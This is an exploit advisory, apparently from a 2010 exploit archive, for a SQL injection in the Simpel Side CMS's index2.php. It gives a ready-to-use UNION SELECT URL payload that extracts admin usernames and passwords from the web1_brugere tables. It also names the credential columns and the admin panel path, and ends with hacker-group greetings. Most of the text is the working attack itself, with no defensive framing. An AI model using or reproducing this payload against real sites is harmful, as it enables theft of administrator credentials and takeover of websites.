Simpel Side (index2.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Simpel Side (index2.php) SQL Injection Vulnerability
# Published : 2010-05-25
# Author : MN9
# Previous Title : Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability
# Next Title : web5000 (page_show) SQL Injection Vulnerability

#Tital : simpelside (index2.php) SQL Injection Vulnerability#EDB-ID: # CVE-ID: ()# OSVDB-ID: ()# Author: MN9# Published: 2010-05-25# Verified: yes



##########################################################>..> Author : MN9
>..> Email  : Mn9(at)Live.No >..> Script Home :  www.simpelside.dk
>..>  Doork :  :)##########################################################
~## Exploit ##~ 
http://site/index2.php?id=2 [ SQL Injection ] &mainid=2

~## Example ##~ http://site/index2.php?id=2 and 1=0 union select 1,2,concat(brugernavn,0x3a,adgangskode),4,5,6 from web1_brugere--&mainid=2

##########################################################
# All Tables admin :: 
web1_brugereweb2_brugereweb3_brugereweb4_brugere
# column user : brugernavn# column pass : adgangskode##########################################################
# admin panel :
http://site/admin/
##########################################################
# Greetz to :
RoMaNcYxHaCkEr ~ Mr.SaFa7 ~ Sniper code ~ All Al-Mslm3n

                [  v4-team.com  ]  &&  [  7rs.org  ]